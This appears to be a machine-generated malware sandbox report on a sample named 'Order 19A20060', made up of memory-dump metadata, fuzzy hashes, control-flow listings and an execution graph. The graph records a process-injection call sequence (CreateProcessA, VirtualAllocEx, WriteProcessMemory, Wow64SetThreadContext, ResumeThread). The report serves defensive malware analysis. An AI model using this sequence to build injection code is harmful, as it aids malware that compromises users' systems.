                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 712a0688a15a59b03ba8737feba6af5555ddc090677da989e4e1bf863bb23440
                                                                              • Instruction ID: e3f76dab6847e60c3a94fe2931cf3b60d562b58f3e1ae5ae2725bd8bf043b7fa
                                                                              • Opcode Fuzzy Hash: 712a0688a15a59b03ba8737feba6af5555ddc090677da989e4e1bf863bb23440
                                                                              • Instruction Fuzzy Hash: 6921C0B5D01619AFCB10DF9AD884ADEFBF4FB48314F10812AE918A7211C375A554CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4096224086.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_126d000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                              • Instruction ID: 53b23006711a9159ea34271aacac2b6678221daa5ef2746843f985e68b5b2175
                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                              • Instruction Fuzzy Hash: 4311BE75604288CFDB12CF54D5C4B15BF61FB84314F24C6AAD9494B696C33AD44ACB61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4d6f9dd26a94898e4e4745da8ecad99628aa98b54963ca1bfcdb163943ce6439
                                                                              • Instruction ID: 56c6f3ddf80642ffd6bd7c7509b7ba02f95743aa9d925adcf4053211d54177c4
                                                                              • Opcode Fuzzy Hash: 4d6f9dd26a94898e4e4745da8ecad99628aa98b54963ca1bfcdb163943ce6439
                                                                              • Instruction Fuzzy Hash: 3C11D0B5D01219AFCB00DF9AD884ADEFFB4FB48324F10812AE918B7200C375A954CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a8f0ef7a2139886fd7206059dd4fa9f41f1300a59016881c0ddbaf8dc0327e37
                                                                              • Instruction ID: efc88d3f1e6342aeb99c2928c7a15181c608290780883306aace0a45dcf96224
                                                                              • Opcode Fuzzy Hash: a8f0ef7a2139886fd7206059dd4fa9f41f1300a59016881c0ddbaf8dc0327e37
                                                                              • Instruction Fuzzy Hash: D7018131B000111BDB64B6AED85072FA7DBEBCD710F24843AE50ECB745DE61DC424395
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 544d8726730a89dd602026bd16644733292afd86c5194f231f37f2aff05604c8
                                                                              • Instruction ID: c3b337ac86dfe32f626e3d55260b7bd6a6e53878dcb22f455bd93f40a5bdb735
                                                                              • Opcode Fuzzy Hash: 544d8726730a89dd602026bd16644733292afd86c5194f231f37f2aff05604c8
                                                                              • Instruction Fuzzy Hash: 6F01AF71B100101FDB65F6ADE890B3FA3EAEBC9720F149439E50ACB344DE21DC024395
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4cb3ac14fb83c739fab5d47c057eeff3d5eb9520c316b93cb1eff70ae0c8518
                                                                              • Instruction ID: 19a2cb8311b01702b8a76cb032f7a7d895aa8a8032a2c99a7ba7741eaf38c61a
                                                                              • Opcode Fuzzy Hash: a4cb3ac14fb83c739fab5d47c057eeff3d5eb9520c316b93cb1eff70ae0c8518
                                                                              • Instruction Fuzzy Hash: 28013134B101255FDB55FB6DE95072EB3D6EBCA714F108429E60ACB358EA21EC028785
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b40aa0db7b8f4af71256f290e7316b3965f4d12ac1527f2ab8db4e5a98ef84ad
                                                                              • Instruction ID: f1441c5b2e7f90a0f8169fcada3238f0ec829fc2213e467765d7adbf757c6718
                                                                              • Opcode Fuzzy Hash: b40aa0db7b8f4af71256f290e7316b3965f4d12ac1527f2ab8db4e5a98ef84ad
                                                                              • Instruction Fuzzy Hash: B701A734A052499FC790FFBCE8405ADBBB5FBC5314F104276D819D7295EB319942CBA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3d1d540eccaf7f52b8549f6f29d97897df0521c2c80873e5152045d3928a73b
                                                                              • Instruction ID: b139afecf7844b6a3e0a6ecfc85fa556a040703bb220560059ce7017db47b20b
                                                                              • Opcode Fuzzy Hash: a3d1d540eccaf7f52b8549f6f29d97897df0521c2c80873e5152045d3928a73b
                                                                              • Instruction Fuzzy Hash: 0401A431E11224ABCB54BA6AFC4169DB775F785324F104539E90AEB345DB32A80587C0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5e1fd30dbafad8f7e9c9db812ca6df4d62a5c46af7c6a2e931c2f4122f3c3f34
                                                                              • Instruction ID: d9a07e4a453e9780d1a9ea0369dfd1630d9209e96ad9ac57f99370ddaeff674d
                                                                              • Opcode Fuzzy Hash: 5e1fd30dbafad8f7e9c9db812ca6df4d62a5c46af7c6a2e931c2f4122f3c3f34
                                                                              • Instruction Fuzzy Hash: CEE022B0E252087BCF60FB70CE2478A3B9E9B83250F1088A5E404CB102E276DA008792
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f0b65934941c9ec8002dee5959485a4213d65f0fcd14b01403a09c020ae62a52
                                                                              • Instruction ID: e1d9c7eb24d6dbfd1482742088c22e1fdb665927c4deab2ea2fb3f23d4f556f5
                                                                              • Opcode Fuzzy Hash: f0b65934941c9ec8002dee5959485a4213d65f0fcd14b01403a09c020ae62a52
                                                                              • Instruction Fuzzy Hash: E1F0FE74A012198FD794FFB9D94026D7BE6BB85204F5042799809D7359EB30D942CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2222239885
                                                                              • Opcode ID: bbaaffb68b301a2f9f52b1e018fa3abd8abfc348c3d1bc1d1ad9b01cdfab319c
                                                                              • Instruction ID: ebee7815f49e431192d9dfbb39b8f7bffb24f32d248d2ab8334fdd099c10db17
                                                                              • Opcode Fuzzy Hash: bbaaffb68b301a2f9f52b1e018fa3abd8abfc348c3d1bc1d1ad9b01cdfab319c
                                                                              • Instruction Fuzzy Hash: A7121C30E002598FDB68EF75D9546AEB7F2BFC5304F208569D40AAB254DB30DD86CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3823777903
                                                                              • Opcode ID: d450de88db3805394d963f49dfdf18f92fafdb6009e228baaf13f4b4b6232291
                                                                              • Instruction ID: 2a4876fa75fdc53a9eff5c8e6d81e2036da718a1cad01638839eaa4cb0636fcc
                                                                              • Opcode Fuzzy Hash: d450de88db3805394d963f49dfdf18f92fafdb6009e228baaf13f4b4b6232291
                                                                              • Instruction Fuzzy Hash: 0C917030E40209DFEBA8FBA5DA44B6EB7F2BF84304F108529D5029B359DB759C46CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-390881366
                                                                              • Opcode ID: 4a40878cc851041ab122bfa5549cd9d460e065149db8c56fa4a4939424ecde48
                                                                              • Instruction ID: 61495339f399b5285f2977c8592b772ef0c8aebe2fa523359df461f71eb10803
                                                                              • Opcode Fuzzy Hash: 4a40878cc851041ab122bfa5549cd9d460e065149db8c56fa4a4939424ecde48
                                                                              • Instruction Fuzzy Hash: AAF16D34A01259CFDB58FB69D984A6EB7F2FF84304F248568D4069B368DB31EC52CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 1f539a8da19cea25f7e361f84ab240bcdd32cf94a531486e3ad264111a899d0f
                                                                              • Instruction ID: ce2626bcfeb44ec6f67b5e8fb040d27cef9272931062c4ccc0f32e3689ccd29e
                                                                              • Opcode Fuzzy Hash: 1f539a8da19cea25f7e361f84ab240bcdd32cf94a531486e3ad264111a899d0f
                                                                              • Instruction Fuzzy Hash: 9EB15E30A112198FDB58FF69E9906AEB7B2FF84304F248929D406DB355DB74DC86CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LR^q$LR^q$$^q$$^q
                                                                              • API String ID: 0-2454687669
                                                                              • Opcode ID: c0345566293f32996bf29fdb10b7e7b2c8f282ca5112deb305de8c919d4a8c83
                                                                              • Instruction ID: b5dd872f868cb8406191aeb334ad2f9a12be70b696bfe4c4b86c563924b409d9
                                                                              • Opcode Fuzzy Hash: c0345566293f32996bf29fdb10b7e7b2c8f282ca5112deb305de8c919d4a8c83
                                                                              • Instruction Fuzzy Hash: 4151A130B002159FDB58FB29E980A6AB7E2FFC4700F148668D4069F3A5DB75EC45CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 293f0aaeab30156d5c99864a942b24f126584aea68b9b0d662327a2efe8ede55
                                                                              • Instruction ID: 975b50592907eb1937f514228b44c5289dd1ea5f1ca272a1a5df045745c9c256
                                                                              • Opcode Fuzzy Hash: 293f0aaeab30156d5c99864a942b24f126584aea68b9b0d662327a2efe8ede55
                                                                              • Instruction Fuzzy Hash: F3518D30E112159FDF65FB68E9806AEB7B2EB85305F108929E9169B358DB30DC42CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:10.4%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:83
                                                                              Total number of Limit Nodes:1
                                                                              execution_graph 28999 24b4668 29000 24b467a 28999->29000 29001 24b4686 29000->29001 29003 24b4779 29000->29003 29004 24b479d 29003->29004 29008 24b4878 29004->29008 29012 24b4888 29004->29012 29010 24b48af 29008->29010 29009 24b498c 29009->29009 29010->29009 29016 24b4248 29010->29016 29013 24b48af 29012->29013 29014 24b4248 CreateActCtxA 29013->29014 29015 24b498c 29013->29015 29014->29015 29017 24b5918 CreateActCtxA 29016->29017 29019 24b59db 29017->29019 29019->29019 29024 24bd0f8 29025 24bd13e 29024->29025 29029 24bd2c8 29025->29029 29032 24bd2d8 29025->29032 29026 24bd22b 29035 24bc9e0 29029->29035 29033 24bc9e0 DuplicateHandle 29032->29033 29034 24bd306 29032->29034 29033->29034 29034->29026 29036 24bd340 DuplicateHandle 29035->29036 29037 24bd306 29036->29037 29037->29026 29038 24bad78 29039 24bad87 29038->29039 29042 24bae60 29038->29042 29050 24bae70 29038->29050 29043 24bae81 29042->29043 29044 24baea4 29042->29044 29043->29044 29058 24bb0f8 29043->29058 29062 24bb108 29043->29062 29044->29039 29045 24bae9c 29045->29044 29046 24bb0a8 GetModuleHandleW 29045->29046 29047 24bb0d5 29046->29047 29047->29039 29051 24bae81 29050->29051 29052 24baea4 29050->29052 29051->29052 29056 24bb0f8 LoadLibraryExW 29051->29056 29057 24bb108 LoadLibraryExW 29051->29057 29052->29039 29053 24bae9c 29053->29052 29054 24bb0a8 GetModuleHandleW 29053->29054 29055 24bb0d5 29054->29055 29055->29039 29056->29053 29057->29053 29059 24bb11c 29058->29059 29061 24bb141 29059->29061 29066 24ba8b0 29059->29066 29061->29045 29063 24bb11c 29062->29063 29064 24bb141 29063->29064 29065 24ba8b0 LoadLibraryExW 29063->29065 29064->29045 29065->29064 29067 24bb2e8 LoadLibraryExW 29066->29067 29069 24bb361 29067->29069 29069->29061 29070 56dd7b8 29071 56dd7f8 ResumeThread 29070->29071 29073 56dd829 29071->29073 29074 56de088 29075 56de111 CreateProcessA 29074->29075 29077 56de2d3 29075->29077 29078 a120078 29079 a120203 29078->29079 29080 a12009e 29078->29080 29080->29079 29083 a1202f0 29080->29083 29086 a1202f8 PostMessageW 29080->29086 29084 a1202f8 PostMessageW 29083->29084 29085 a120364 29084->29085 29085->29080 29087 a120364 29086->29087 29087->29080 28995 56ddaf0 28996 56ddb3b ReadProcessMemory 28995->28996 28998 56ddb7f 28996->28998 29020 56dd940 29021 56dd980 VirtualAllocEx 29020->29021 29023 56dd9bd 29021->29023 29088 56dff80 29089 56dff95 29088->29089 29093 56dd868 29089->29093 29097 56dd860 29089->29097 29090 56dffab 29094 56dd8ad Wow64SetThreadContext 29093->29094 29096 56dd8f5 29094->29096 29096->29090 29098 56dd868 Wow64SetThreadContext 29097->29098 29100 56dd8f5 29098->29100 29100->29090 29101 56dda00 29102 56dda48 WriteProcessMemory 29101->29102 29104 56dda9f 29102->29104
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a8fd122df1ce92941350a1e00e30dd5b6c9a83a7a9ccdda75fcf864cbe0f6141
                                                                              • Instruction ID: 10dd50d92642beae657fd6cf636f7afd18eaf71b2d2ca7a9c42fd58b0369b7e1
                                                                              • Opcode Fuzzy Hash: a8fd122df1ce92941350a1e00e30dd5b6c9a83a7a9ccdda75fcf864cbe0f6141
                                                                              • Instruction Fuzzy Hash: 7E21D571E056188BEB08DFABD8046EEBAF7FFC9310F04C52AD409AB254EB740846CB10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 294 56800df-5680186 301 5680188-5680194 294->301 302 56801b0 294->302 303 568019e-56801a4 301->303 304 5680196-568019c 301->304 305 56801b6-5680263 302->305 306 56801ae 303->306 304->306 314 568028d 305->314 315 5680265-5680271 305->315 306->305 318 5680293-56804ec 314->318 316 568027b-5680281 315->316 317 5680273-5680279 315->317 319 568028b 316->319 317->319 328 56804ef call 56d2419 318->328 329 56804ef call 56d2428 318->329 319->318 322 56804f5-568068e 330 5680693 call 56d3be0 322->330 331 5680693 call 56d3bd0 322->331 325 5680699-56806bf 332 56806c5 call 56d450f 325->332 333 56806c5 call 56d4520 325->333 327 56806cb-56806da 328->322 329->322 330->325 331->325 332->327 333->327
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 555bea386725fc5d0488bc5a6768936c91ac120c4ac70ae98a709345e0244985
                                                                              • Instruction ID: e3e09a6d5bb09904c9651b675dcb572cb4025690cd7dd0d69f6f257e066a8b9f
                                                                              • Opcode Fuzzy Hash: 555bea386725fc5d0488bc5a6768936c91ac120c4ac70ae98a709345e0244985
                                                                              • Instruction Fuzzy Hash: EE51F434A00218CFEB64DF68D994BA9B7B2FB89300F108599D44DA7345CB34AE86CF52
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 357 56de07c-56de11d 359 56de11f-56de129 357->359 360 56de156-56de176 357->360 359->360 361 56de12b-56de12d 359->361 367 56de1af-56de1de 360->367 368 56de178-56de182 360->368 362 56de12f-56de139 361->362 363 56de150-56de153 361->363 365 56de13d-56de14c 362->365 366 56de13b 362->366 363->360 365->365 369 56de14e 365->369 366->365 374 56de217-56de2d1 CreateProcessA 367->374 375 56de1e0-56de1ea 367->375 368->367 370 56de184-56de186 368->370 369->363 372 56de1a9-56de1ac 370->372 373 56de188-56de192 370->373 372->367 376 56de194 373->376 377 56de196-56de1a5 373->377 388 56de2da-56de360 374->388 389 56de2d3-56de2d9 374->389 375->374 379 56de1ec-56de1ee 375->379 376->377 377->377 378 56de1a7 377->378 378->372 380 56de211-56de214 379->380 381 56de1f0-56de1fa 379->381 380->374 383 56de1fc 381->383 384 56de1fe-56de20d 381->384 383->384 384->384 386 56de20f 384->386 386->380 399 56de370-56de374 388->399 400 56de362-56de366 388->400 389->388 402 56de384-56de388 399->402 403 56de376-56de37a 399->403 400->399 401 56de368 400->401 401->399 405 56de398-56de39c 402->405 406 56de38a-56de38e 402->406 403->402 404 56de37c 403->404 404->402 407 56de3ae-56de3b5 405->407 408 56de39e-56de3a4 405->408 406->405 409 56de390 406->409 410 56de3cc 407->410 411 56de3b7-56de3c6 407->411 408->407 409->405 413 56de3cd 410->413 411->410 413->413
                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 056DE2BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 23f104d5216fa2b7e3b6857d495b0d4a91e9b774c9489af85b0e216f29987a3c
                                                                              • Instruction ID: 1527d0e9738a788ccd2b7f0bdff6594a54880f845c96a20808acc1052192337c
                                                                              • Opcode Fuzzy Hash: 23f104d5216fa2b7e3b6857d495b0d4a91e9b774c9489af85b0e216f29987a3c
                                                                              • Instruction Fuzzy Hash: 73A15B71D00219DFDB20CFA8CC41BADBBB6BF48314F1585A9D809AB240DB759985CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 414 56de088-56de11d 416 56de11f-56de129 414->416 417 56de156-56de176 414->417 416->417 418 56de12b-56de12d 416->418 424 56de1af-56de1de 417->424 425 56de178-56de182 417->425 419 56de12f-56de139 418->419 420 56de150-56de153 418->420 422 56de13d-56de14c 419->422 423 56de13b 419->423 420->417 422->422 426 56de14e 422->426 423->422 431 56de217-56de2d1 CreateProcessA 424->431 432 56de1e0-56de1ea 424->432 425->424 427 56de184-56de186 425->427 426->420 429 56de1a9-56de1ac 427->429 430 56de188-56de192 427->430 429->424 433 56de194 430->433 434 56de196-56de1a5 430->434 445 56de2da-56de360 431->445 446 56de2d3-56de2d9 431->446 432->431 436 56de1ec-56de1ee 432->436 433->434 434->434 435 56de1a7 434->435 435->429 437 56de211-56de214 436->437 438 56de1f0-56de1fa 436->438 437->431 440 56de1fc 438->440 441 56de1fe-56de20d 438->441 440->441 441->441 443 56de20f 441->443 443->437 456 56de370-56de374 445->456 457 56de362-56de366 445->457 446->445 459 56de384-56de388 456->459 460 56de376-56de37a 456->460 457->456 458 56de368 457->458 458->456 462 56de398-56de39c 459->462 463 56de38a-56de38e 459->463 460->459 461 56de37c 460->461 461->459 464 56de3ae-56de3b5 462->464 465 56de39e-56de3a4 462->465 463->462 466 56de390 463->466 467 56de3cc 464->467 468 56de3b7-56de3c6 464->468 465->464 466->462 470 56de3cd 467->470 468->467 470->470
                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 056DE2BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1718002605.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_56d0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: fc6e9160eed7b6232e1154c7e08c1f5de9b30ee6d3cd2652aea38ab16ef8de89
                                                                              • Instruction ID: 627e1d3b3b7f4957a1690eece1b6b0409d5aa7786496f84c6f1f8e904d8278c7
                                                                              • Opcode Fuzzy Hash: fc6e9160eed7b6232e1154c7e08c1f5de9b30ee6d3cd2652aea38ab16ef8de89
                                                                              • Instruction Fuzzy Hash: D1914A71D00219DFDB20DFA8CC41BADFBB6BF48314F1585A9D809AB240DB759985CFA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 471 24bae70-24bae7f 472 24baeab-24baeaf 471->472 473 24bae81-24bae8e call 24b9878 471->473 474 24baec3-24baf04 472->474 475 24baeb1-24baebb 472->475 480 24bae90 473->480 481 24baea4 473->481 482 24baf11-24baf1f 474->482 483 24baf06-24baf0e 474->483 475->474 526 24bae96 call 24bb0f8 480->526 527 24bae96 call 24bb108 480->527 481->472 484 24baf43-24baf45 482->484 485 24baf21-24baf26 482->485 483->482 488 24baf48-24baf4f 484->488 489 24baf28-24baf2f call 24ba854 485->489 490 24baf31 485->490 486 24bae9c-24bae9e 486->481 487 24bafe0-24bb0a0 486->487 521 24bb0a8-24bb0d3 GetModuleHandleW 487->521 522 24bb0a2-24bb0a5 487->522 491 24baf5c-24baf63 488->491 492 24baf51-24baf59 488->492 493 24baf33-24baf41 489->493 490->493 496 24baf70-24baf79 call 24ba864 491->496 497 24baf65-24baf6d 491->497 492->491 493->488 502 24baf7b-24baf83 496->502 503 24baf86-24baf8b 496->503 497->496 502->503 505 24bafa9-24bafad 503->505 506 24baf8d-24baf94 503->506 508 24bafb3-24bafb6 505->508 506->505 507 24baf96-24bafa6 call 24ba874 call 24ba884 506->507 507->505 511 24bafd9-24bafdf 508->511 512 24bafb8-24bafd6 508->512 512->511 523 24bb0dc-24bb0f0 521->523 524 24bb0d5-24bb0db 521->524 522->521 524->523 526->486 527->486
                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 024BB0C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: 00e6a7836345e1336aac73ad0995076fd41ee4742fe57e70d7c927f4bc01347b
                                                                              • Instruction ID: f12f2b4f762496632761d764444e273afe682573bdfb5f9e6958c4f6a09ba4d9
                                                                              • Opcode Fuzzy Hash: 00e6a7836345e1336aac73ad0995076fd41ee4742fe57e70d7c927f4bc01347b
                                                                              • Instruction Fuzzy Hash: 717113B0A00B158FD725DF6AD04479ABBF1FF88304F00892AD48A97A50D775E94ACBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 528 24b4248-24b59d9 CreateActCtxA 531 24b59db-24b59e1 528->531 532 24b59e2-24b5a3c 528->532 531->532 539 24b5a4b-24b5a4f 532->539 540 24b5a3e-24b5a41 532->540 541 24b5a51-24b5a5d 539->541 542 24b5a60 539->542 540->539 541->542 544 24b5a61 542->544 544->544
                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 024B59C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713492102.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_24b0000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
